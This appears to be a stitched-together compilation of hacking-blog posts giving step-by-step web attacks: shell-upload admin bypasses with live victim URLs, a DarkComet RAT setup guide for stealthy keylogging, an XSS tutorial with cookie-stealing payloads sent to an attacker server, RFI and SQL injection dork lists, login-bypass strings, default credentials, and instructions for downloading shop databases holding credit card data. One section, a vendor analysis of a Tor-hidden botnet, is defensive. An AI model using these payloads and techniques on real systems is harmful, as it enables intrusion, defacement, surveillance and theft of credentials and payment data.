#DiyWeb Admin Bypass and Remote file/shell Upload exploit

Hi Guys, hope you are well. so we are back on our Old topic after a long time ! enjoy new exploit and please share your views and share our Links on Facebook,twitter etc. Thanks !
so Now turn to work. our new exploit is DiyWeb admin bypass, in this vulnerability we can upload our shell, deface pages, and files by bypassing admin login panel.
Exploit title : DiyWeb Admin Bypass and & file Upload exploit
Discovered By : NoentryPhc
Sever : windows
Type : web application
Shell extention : .asp

Dork : “Power by DiyWeb”
inurl:/template.asp?menuid=
Poc : diyweb/menu/admin/image_manager.asp
This exploit’s almost all vulnerable websites are Malaysiyan.
To upload your files Goto :http://www.website.com/diyweb/menu/admin/image_manager.asp
and upload your shell/deface there !
if .php extention is not allowed then your can try tamper data and live http headers
to acess your file goto : http://www.website.com/Images/yourfilehere and sometimes you have to find your manually on websites
Live Demo : 
http://otgmalaysia.com/diyweb/menu/admin/image_manager.asp
http://www.famosapadu.com.my/diyweb/menu/admin/image_manager.asp
find more using Google dork 🙂 Thanks for reading. please share post on facebook and other social networks

#Tinymce PHP file Manager, Remote File upload vulnerably

Title :Tinymce PHP file Manager, Remote File upload vulnrablity
server : Linux
Type : webapp Exploit
Hamr : remote shell upload
Dork : inurl:/file_manager.php?type=img

Goto google.com and type dork inurl:/file_manager.php?type=img & inurl:/file_manager.php?type=file to Find vulnrable websites, to get more sites you can modify this dork,
Exploit Patch : http://www.site.com/directory/tinymce/file_manager.php?type=file
so Goto http://www.site.com/directory/tinymce/file_manager.php?type=file  and upload your file there,
if php & html uploading is denided, you can try Tamper Data and Live Http Headers
Live demo :
http://piter-ka.ru/media/tinymce/file_manager.php?type=file
http://www.oki-iroda.hu/72h2010/tinymce/jscripts/file_manager.php?type=img

#Botnet command server hidden in Tor

The G Data SecurityLabs recently identified a malware sample that takes the next step in Command-and-Control (short: C&C) communication evolution, regarding C&C traffic obfuscation. The botnet owners placed their C&C server, which uses the common IRC protocol, as a hidden service inside of the Tor network.

The analyzed bot:

Despite the novel way of C&C-communication, the other features of the analyzed bot are quite common these days. It offers several possibilities for DDoS attacks, can download and execute other malware, and can act as SOCKS proxy to anonymize the attacker.

What is it about?

One of the biggest challenges for botnet owners is the protection of Command-and-Control traffic. C&C traffic is required to give orders to the “zombies”, the infected computers that are part of the botnets. Generally, up to now, two approaches existed for C&C traffic: Either a central control server is put somewhere on the Internet or Peer-to-Peer-networks (short: P2P) are built up to ensure the chain of commands.

One central C&C server:

Central control servers have a big problem: Regardless of the underlying protocol, they are a “single point of failure”. The servers can be taken over by authorities, and thus the malware can be uninstalled from the zombies. It is possible to conceal the server, e.g. by having a hidden algorithm that changes domain names on a daily base; but these algorithms can be reverse engineered.

The P2P architecture:

An alternative is the usage of classic P2P networks. P2P networks became (in)famous with the rise of Napster, which used to be a service where every user could send and receive music from and to other users. Every user acted as client and server simultaneously, hence the term Peer-to-Peer.

Malware adapted to this scheme by giving every zombie the ability to issue commands to other zombies. The botnet owner issues the command to a handful of zombies, and these zombies propagate the commands to other zombies, and so on and so forth. Even though this seems to be more sophisticated than the direct client-server-communication, it is anything but perfect.
Zombies are often located behind routers, meaning that they effectively cannot act as a server, because the routers do not allow incoming traffic by default. Also, the protocol has to be especially designed for the respective bot, which results in a great implementation effort.

Furthermore, there are security issues the botnet owners have to think about: By design, every zombie programmed for the P2P-communication has the ability to issue commands to other zombies. Therefore authorities or other cybercriminals could issue commands to conduct a hostile takeover of the botnet. Generally, it is possible to authenticate messages, but botnet owners often find it hard to implement this or are not willing to put that much effort into these authentication mechanisms. This resulted in several botnet takedowns and even takeovers in the last couple of years.

The next step made – using the Tor network

The next step in evolution is the usage of the Tor network. Tor is generally known as web anonymization service for end users, but Tor offers more than that: “Tor makes it possible for users to hide their locations while offering various kinds of services, such as web publishing or an instant messaging server.”

In this particular case, the creators of the malware decided to build an IRC server as hidden service.

This gains the botnet owner several advantages:

• The server is anonymous and thus cannot point to the botnet owners’ identity.
• The server cannot be taken down easily.
• The traffic is encrypted by Tor, so it can’t be blocked by Intrusion Detection Systems.
• Tor traffic usually cannot be blocked altogether, because there are also legit use cases for Tor.
• The bot creator does not necessarily have to generate a custom protocol, but can use the known and reliable IRC protocol.

Besides these advantages, it has to be noted that malware like this suffers from the latencies that come with the Tor network. In other words: Tor tends to be slow and unreliable, and inherits these flaws to underlying botnets. Also, while this traffic adds a lot of security to the botnet communication, the malware itself still can be blocked by AV software using signature- and behavior-based detection mechanism.

#How To Set-Up and Use Dark Comment Rat

You have the RAT dark comet but dont know how to use? 

THen.

1. Download Dark comet rat from here : http://adf.ly/Cc6Di

2. Open it and you must see something like this

3. Click on Edit server

4. (Mains stetting) Mutex String:

Our RAT client will run in process space of another process to remain stealthy. This string helps differentiate RAT that some another process is holding our data for hiding. Must be specified for proper functioning of RAT client, you can give it any name you want or just press random to get random name.
Server ID:

This name will appear on server list when your victim will execute your server. Helps in differentiating different servers so better use new name for new server.

Lastly always preserve connection with good user-name and password.

5. (connection settings) Specify your IP address in IP address field if you have static IP or use Dynamic DNS if your IP address is not static. To know more about Dynamic DNS IP read Use Dynamic IP As Static IP. Now specify port number you want to listen and press “Add This Range In IP/port list”. For testing purpose you can use 127.0.0.1 that is loop back IP and port 8080 I.e http proxy port.

6. Go to server start up
Here you can specify where your sever will get installed in victim's PC and you can also specify in which process you wish to hide you server. A good choice for process is svchost.exe, melt server option will delete server file as soon as server gets installed. Other options includes adding registry keys, use them if you want but it works fine without any key. Don't forget to enable option of “Start Server ON Startup”.

7. Server Shield.
Server Shield provides server with file attributes and folder attributes for installation and basic fun options to harass victim. I would better advise not to use them because it will alarm user about presence of your RAT server.

8. offline keylogger
Activate offline key-logger so that key-logger should log files even though you are offline. If you want server to send log files to your ftp server rather than accumulating in victim PC, specify credentials required for your ftp server. If you don't have ftp server, you can search for “free ftp service” on Google and you will get heap of them or you can try out http://www.zymic.com/free-web-hosting/ it offers free-web-hosting plus free ftp service. Good for practice.

9. Go to file binder

Select file you want to bind with RAT server, binding with another file make RAT server remain in stealth mode and get executed with legitimate file thus avoiding detection.

10. Genreate server.

Select all options and generate server.

11. Listen 
Now close server edit window and press listen, specify port number 8080 and then execute your RAT server.

12. Listening on port 8080

Now right click on listening port and select “Open Control Center”, play with available options.

those pics above are of control center.

You have succesfully setted up the rat :)

xL3gi0n Changes His Name !

 

Owner of xL3gi0n Hackers which his name he had for the group was (xL3gi0n) .. The group is still called xL3gi0n Hackers but the owner of the group changed his name to..

xPsych0path.. His new contact info his different you can see it below this post of word’s… Haha but anyway’s he just changed his name mainly because of the confusing.. People asking him you hacked it our your group because it’s called xL3gi0n Hackers and his name was xL3gi0n that’s why… But hope you enjoy this site !!!!!

 

Contact info
————–
:-http://twitter.com/xPsych0path
:-http://pastebin.com/u/xPsych0path

Email	xPsych0path@hotmail.com

:-http://www.facebook.com/xPsych0path <– Like on facebook.

ωє αяє χℓ3gι0η.уσυ αяє ησтнιηg. уσυ ωιℓℓ ƒαℓℓ ιη тнє нαη∂’ѕ σƒ συя ƒєℓℓσω вяσтнєяѕ αη∂ ѕιѕтєяѕ. ωє υηιтє αѕ σηє вυт ƒιgнт αѕ мαηу.
————-
xPsych0path © Official Page ✔ ║║▌▌█│║▌│ ™ © Original Page ✔

Save The Pandas !

Save the pandas 😀

☢☠☣ ⓧⓁ③ⓖⓘⓞⓝ ☢☠☣
♠♦♣[—————————] ♠♦♣

xL3gi0n Defaces 2 site’s that have to deal with cutting down bamboo. By this he saves pandas and there naturally habitat  they sale there bamboo online to other online merchants and etc…

SAVE PANDAS 😀

http://giaochau.com.vn/ <– Giao Chau Rattan & Bamboo Manufacture And Export Co. Ltd <– Under the same server

http://bamboocraftgc.com/ < — Giao Chau Rattan & Bamboo Manufacture And Export Co. Ltd <– Under the same server

http://www.zone-h.org/archive/notifier=xL3gi0n <– Mirrors :DD

#How To Do XSS

Table Of Contents

What is XSS?
Finding XSS Vulnerabilities
The Basics On XSS
Deface Methods
Cookie Stealing
Filtration Bypassing
___________________
What is XSS?
‘XSS’ also known as ‘CSS’ (Cross Site Scripting, Easily confused with ‘Cascading Style Sheets’)
is a very common vulnerbility found in Web Applications, ‘XSS’ allows the attacker to INSERT
malicous code,There are many types of XSS there but i will only explain 3 of them and they are most important
1-‘URL XSS’ this means that the XSS wont stay on the page it will only get executed if you have the malicous code in the URL and submit the url.

2- Input fields, Where ever you can insert data, it is very common, to be XSS vulnerable, for example say we found a site with a search engine, Now in the search box you enter ‘hacker’ now hit enter, when the page loads, if it says your data like ‘Found 100 Results For hacker’ ok now you see its displaying out data on the page, now what if we can exexute code? there is no possible way to execute PHP code in this Attack, but certainly is for HTML, Javascript, but be aware this method.

3-In the Third one you will be able to INSERT data (code) and it will stay on the website.now there are 2 kinds, it depends if we can execute PHP or HTML if we can inject PHP then we can also inject HTML but NOT vice versa, Ok this kinda attack is normally found on Blogs, Shoutboxes, Profiles Forums, just most places where you insert data and it stays there. now HTML is totally different then PHP.HTML downloads to your pc and then your ‘Browser’ parses/interprets the code, (that’s why its source is viewable) With PHP the code is interpreted on the server the script is hosted on, then the data is returned to the browser.For PHP injection its rare, But it don’t harm to try. Note: PHP code cant be injected into HTML page!

Finding XSS Vulnerabilities
Well to start finding these vulnerabilities you can start checking out
Blogs, Forums, Shoutboxes, Comment Boxes, Search Box’s and many things

Using ‘Google Dorks’ to make the finding easier, Ok if you wanna get cracking, goto Google.com and type
inurl:”search.php?q=” now that is a common page and has a lot of results, Now lets move on to the next part

The Basics On XSS

To know the basic this Picture may help you

The most used Xss injection is

<script>alert(“XSS”)</script>

This will alert a popup saying xss if the site is vulnerable and this is easily editable means you can also inject
<script>alert(“your name or message”)</script>
So going previous i told you a google dork , search.php?q=
Well we will use this to check for vulnerabilities

To check if it is vulnerable we type

http://www.site.com/search.php?q=<script>alert(“your name or message”)</script>

This then gives a popup like this

Many at times this works but if it does not work don’t cry we have another way.. 

You can try injecting HTMl 😉

You can put this two strings to inject html

<h1>anything you want</h1>
<br><br><b><u>any thing you want</u></b>

so our url will be

http://www.site.com/search.php?q= <h1>anything you want</h1>
or
http://www.site.com/search.php?q=<br&…t;u>any thing you want</u></b>
If you see the bold text on the page and newlines then you knows its vuln

Example

Deface Methods
Well now you understand how XSS works, we can explain some simple XSS deface methods, there
are many ways for defacing i will mention some of the best and most I used,

<html><body><IMG SRC=”http://site.com/yourDefaceIMAGE.png”></body></html&gt;

the first one being IMG SCR, now for those of you who dont know HTML, IMG SCR is a tag, that
displays the IMAGE linked to it on the webpage.

ok now if u change the link to a valid picture link, and save it and run it you will see your deface page

let us say we have have found a Shoutbox, Comment box, or anything that shows your data after you submitted it you could insert the following to make the picture display on the page.

<IMG SRC=”http://site.com/yourDefaceIMAGE.png”&gt;

Ok it helps to make your picture big so it stands out and its clear the site got hacked.

Another method is using FLASH videos, its the same has the method below but a little more stylish deface.

window.open( “http://Dl4hacks.net&#8221; )</script>

Cookie Stealing

This is the best thing about XSS..

First Get your self a cookie stealer- from here

ok now you have it save it has a .php file and upload to your server, remember to create the file ‘log.txt’ too
and chmod it to 777, ok now find a XSS vulnerable website, any attack type will do.

ok now your gona want to insert this code.

window.location = “http://yourServer.com/cookielogger.php?c=”+document.cookie

or

document.location = “http://yourServer.com/cookielogger.php?c=”+document.cookie
now when user visits the page that got injected too, they will be sent to the site, and cookie will be stolen
the second one is more stealth.

Now it is the time to hijack the cookies

http://site.com/search.php?q=document.location = “http://yourServer.com/cookielogger.php?c=”+document.cookie
Filteration Bypassing

Alot of sites may seem vulnerable but not executing the code..This will help you

Some common methods to bypass filteration is

‘)alert(‘xss’);

or

“);alert(‘xss’);

that will do the same thing has <script>alert(“XSS”)</script> on a vulnerable server.

You can also try hexing or base64 encoding your data before you submit,

Please note its bad practice to use alert(“XSS”) to test for XSS, has ive known sites block the keyword XSS
before.

Some other ways to bypass filteration

<script type=text/javascript>alert(“saurav”)</script>
<script>alert(“saurav”)</script>;
<script>alert(“saurav”);</script>
<script>alert(“/saurav”/)</script>

Thanks!

#RFI Dork’s

/_functions.php?prefix=
/cpcommerce/_functions.php?prefix=
/modules/coppermine/themes/default/theme.php?THEME_DIR=
/modules/agendax/addevent.inc.php?agendax_path=
/ashnews.php?pathtoashnews=
/eblog/blog.inc.php?xoopsConfig[xoops_url]=
/pm/lib.inc.php?pm_path=
/b2-tools/gm-2-b2.php?b2inc=
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/includes/include_once.php?include_file=
/e107/e107_handlers/secure_img_render.php?p=
/shoutbox/expanded.php?conf=
/main.php?x=
/myPHPCalendar/admin.php?cal_dir=
/index.php/main.php?x=
/index.php?include=
/index.php?x=
/index.php?open=
/index.php?visualizar=
/template.php?pagina=
/index.php?pagina=
/index.php?inc=
/includes/include_onde.php?include_file=
/index.php?page=
/index.php?pg=
/index.php?show=
/index.php?cat=
/index.php?file=
/db.php?path_local=
/index.php?site=
/htmltonuke.php?filnavn=
/livehelp/inc/pipe.php?HCL_path=
/hcl/inc/pipe.php?HCL_path=
/inc/pipe.php?HCL_path=
/support/faq/inc/pipe.php?HCL_path=
/help/faq/inc/pipe.php?HCL_path=
/helpcenter/inc/pipe.php?HCL_path=
/live-support/inc/pipe.php?HCL_path=
/gnu3/index.php?doc=
/gnu/index.php?doc=
/phpgwapi/setup/tables_update.inc.php?appdir=
/forum/install.php?phpbb_root_dir=
/includes/calendar.php?phpc_root_path=
/includes/setup.php?phpc_root_path=
/inc/authform.inc.php?path_pre=
/include/authform.inc.php?path_pre=
index.php?nic=
index.php?sec=
index.php?content=
index.php?link=
index.php?filename=
index.php?dir=
index.php?document=
index.php?view=
*.php?sel=
*.php?session=&content=
*.php?locate=
*.php?place=
*.php?layout=
*.php?go=
*.php?catch=
*.php?mode=
*.php?name=
*.php?loc=
*.php?f=
*.php?inf=
*.php?pg=
*.php?load=
*.php?naam=
all/index.php?page= site:*.ru
all/index.php?file= site:*.ru

#Big List Of Google Dorks Hacking.

Most of these are outdated but they can still work if you happen to find a vulnerable site:

1:

google dork :–> inurl:”/cart.php?m=”
target looks lile :–> http://xxxxxxx.com/s…cart.php?m=view
exploit: chage cart.php?m=view to /admin
target whit exploit :–> http://xxxxxx.com/store/admin
Usename : ‘or”=”
Password : ‘or”=”

2-

google dork :–> allinurlroddetail.asp?prod=
target looks like :–> http://www.xxxxx.org/proddetail.asp?prod=XXXX (big leters and numbers )
exploit :–> chage the proddtail.asp?prod=SG369 whit fpdb/vsproducts.mdb
target whit exploit :–> http://www.xxxxxx.org/fpdb/vsproducts.mdb

3-

google dork :–> allinurl: /cgi-local/shopper.cgi
target looks like :–> http://www.xxxxxx.co&#8230;.dd=action&key=
exploit :–> …&template=order.log
target whit exploit :–> http://www.xxxxxxxx&#8230;..late=order.log

4-

google dork :–> allinurl: Lobby.asp
target looks like :–> http://www.xxxxx.com/mall/lobby.asp
exploit :–> change /mall/lobby.asp to /fpdb/shop.mdb
target whit exploit :–> http://www.xxxxx.com/fpdb/shop.mdb

5-

google dork :–> allinurl:/vpasp/shopsearch.asp
when u find a target put this in search box
Keyword=&category=5); insert into tbluser (fldusername) values
(”)–&SubCategory=&amp;hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=”–&SubCategory=All&amp;action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess=’1′ where
fldusername=”–&SubCategory=All&action.x=33&action.y=6
Jangan lupa untuk mengganti dan nya terserah kamu.
Untuk mengganti password admin, masukkan keyword berikut :
Keyword=&amp;category=5); update tbluser set fldpassword=” where
fldusername=’admin’–&SubCategory=All&action.x=33&action.y=6

login page: http://xxxxxxx/vpasp/shopadmin.asp

6-

google dork :–> allinurl:/vpasp/shopdisplayproducts.asp
target looks like :–> http://xxxxxxx.com/v&#8230;.asp?cat=xxxxxx
exploit :–> http://xxxxxxx.com/vpasp/shopdisplay…20union%20sele ct%20fldauto,fldpassword%20from%20tbluser%20where% 20fldusername=’admin’%20and%20fldpassword%20like%2 0’a%25′-
if this is not working try this ends
%20’a%25′–
%20’b%25′–
%20’c%25′–
after finding user and pass go to login page:
http://xxxx.com/vpasp/shopadmin.asp

7-

google dork :–> allinurl:/shopadmin.asp
target looks like :–> http://www.xxxxxx.com/shopadmin.asp
exploit:
user : ‘or’1
pass : ‘or’1

8-

google.com :–> allinurl:/store/index.cgi/page=
target looks like :–> http://www.xxxxxx.co&#8230;.short_blue.htm
exploit :–> ../admin/files/order.log
target whit exploit :–> http://www.xxxxxxx.c&#8230;.iles/order.log

9-

google.com:–> allinurl:/metacart/
target looks like :–> http://www.xxxxxx.com/metacart/about.asp
exploit :–> /database/metacart.mdb
target whit exploit :–> http://www.xxxxxx.com/metacart/database/metacart.mdb

10-

google.com:–> allinurl:/DCShop/
target looks like :–> http://www.xxxxxx.com/xxxx/DCShop/xxxx
exploit :–> /DCShop/orders/orders.txt or /DCShop/Orders/orders.txt
target whit exploit :–> http://www.xxxx.com/xxxx/DCShop/orders/orders.txt or http://www.xxxx.com/xxxx/DCShop/Orders/orders.txt

11-

google.com:–> allinurl:/shop/category.asp/catid=
target looks like :–> http://www.xxxxx.com/shop/category.asp/catid=xxxxxx
exploit :–> /admin/dbsetup.asp
target whit exploit :–> http://www.xxxxxx.com/admin/dbsetup.asp
after geting that page look for dbname and path. (this is also good file sdatapdshoppro.mdb , access.mdb)
target for dl the data base :–> http://www.xxxxxx.com/data/pdshoppro.mdb (dosent need to be like this)
in db look for access to find pass and user of shop admins.

12-

google.com:–> allinurl:/commercesql/
target looks like :–> http://www.xxxxx.com/commercesql/xxxxx
exploit :–> cgi-bin/commercesql/index.cgi?page=
target whit exploit admin config :–> http://www.xxxxxx.co&#8230;./admin_conf.pl
target whit exploit admin manager :–> http://www.xxxxxx.co&#8230;.in/manager.cgi
target whit exploit order.log :–> http://www.xxxxx.com&#8230;.iles/order.log

13-

google.com:–> allinurl:/eshop/
target looks like :–> http://www.xxxxx.com/xxxxx/eshop
exploit :–>/cg-bin/eshop/database/order.mdb
target whit exploit :–> http://www.xxxxxx.co&#8230;.base/order.mdb
after dl the db look at access for user and password

14-

1/search google: allinurl:”shopdisplayproducts.asp?id=
—>http://victim.com/shopdisplayproducts.asp?id=5

2/find error by adding ‘
—>http://victim.com/shopdisplayproducts.asp?id=5&#8242;

—>error: Microsoft JET database engine error “80040e14″…../shop$db.asp, line467

-If you don’t see error then change id to cat

—>http://victim.com/shopdisplayproducts.asp?cat=5&#8242;

3/if this shop has error then add this: %20union%20select%201%20from%20tbluser”having%201= 1–sp_password

—>http://victim.com/shopdisplayproduct…on%20select%20 1%20from%20tbluser”having%201=1–sp_password

—>error: 5’ union select 1 from tbluser “having 1=1–sp_password…. The number of column in the two selected tables or queries of a union queries do not match……

4/ add 2,3,4,5,6…….until you see a nice table

add 2
—->http://victim.com/shopdisplayproduct…on%20select%20 1,2%20from%20tbluser”having%201=1–sp_password
then 3
—->http://victim.com/shopdisplayproduct…on%20select%20 1,2,3%20from%20tbluser”having%201=1–sp_password
then 4 —->http://victim.com/shopdisplayproduct…on%20select%20 1,2,3,4%20from%20tbluser”having%201=1–sp_password

…5,6,7,8,9…. untill you see a table. (exp:…47)

—->http://victim.com/shopdisplayproduct…on%20select%20 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,,43,44,45,46,47%20from%20tbluser” having%201=1–sp_password
—->see a table.
5/When you see a table, change 4 to fldusername and 22 to fldpassword you will have the admin username and password

—>http://victim.com/shopdisplayproduct…on%20%20elect% 201,2,3,fldusername,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,fldpassword,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46, 47%20from%20tbluser%22having%201=1–sp_password

6/Find link admin to login:
try this first: http://victim.com/shopadmin.asp
or: http://victim.com/shopadmin.asp
Didn’t work? then u have to find yourself:

add: (for the above example) ‘%20union%20select%201,2,3,fieldvalue,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration”ha ving%201=1–sp_password

—>http://victim.com/shopdisplayproduct…n%20select%201 ,2,3,fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration”ha ving%201=1–sp_password
you’ll see something like: ( lot of them)

shopaddmoretocart.asp
shopcheckout.asp
shopdisplaycategories.asp
…………..

then guess admin link by adding the above data untill you find admin links

15-

Type: VP-ASP Shopping Cart
Version: 5.00
Dork = intitle:VP-ASP Shopping Cart 5.00
You will find many websites with VP-ASP 5.00 cart software installed
Now let’s get to the exploit..

the page will be like this ****://***.victim.com/shop/shopdisplaycategories.asp
The exploit is : diag_dbtest.asp
so do this:
****://***.victim.com/shop/diag_dbtest.asp

A page will appear with something like:

xDatabase
shopping140

xDblocation
resx

xdatabasetypexEmailxEmailNamexEmailSubjectxEmailSy stemxEmailTypexOrdernumber.:. EXAMPLE .:.
the most important thing here is xDatabase
xDatabase: shopping140
ok now the URL will be like this:
****://***.victim.com/shop/shopping140.mdb
if you didn’t download the Database..
Try this while there is dblocation.
xDblocation
resx

the url will be:
****://***.victim.com/shop/resx/shopping140.mdb
If u see the error message you have to try this :
****://***.victim.com/shop/shopping500.mdb

download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at download.com

inside you should be able to find credit card information.
and you should even be able to find the admin username and password for the website.

the admin login page is usually located here
****://***.victim.com/shop/shopadmin.asp

if you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all then try to find the admin login page and enter the default passwords which are

Username: admin
password: admin
OR
Username: vpasp
password: vpasp
16-

Sphider Version 1.2.x (include_dir) remote file inclusion

# Sphider Version 1.2.x (include_dir) remote file inclusion
# script Vendor: http://cs.ioc.ee/~ando/sphider/
# Discovered by: IbnuSina
found on index.php
$include_dir = “./include”; <— no patch here
$language_dir = “./languages”;
include “$include_dir/index_header.inc”;
include “$include_dir/conf.php”;
include “$include_dir/connect.php”;

exploitz : http://targe.lu/%5Bsphiderpath%5D/index.php?include_dir=injekan.lu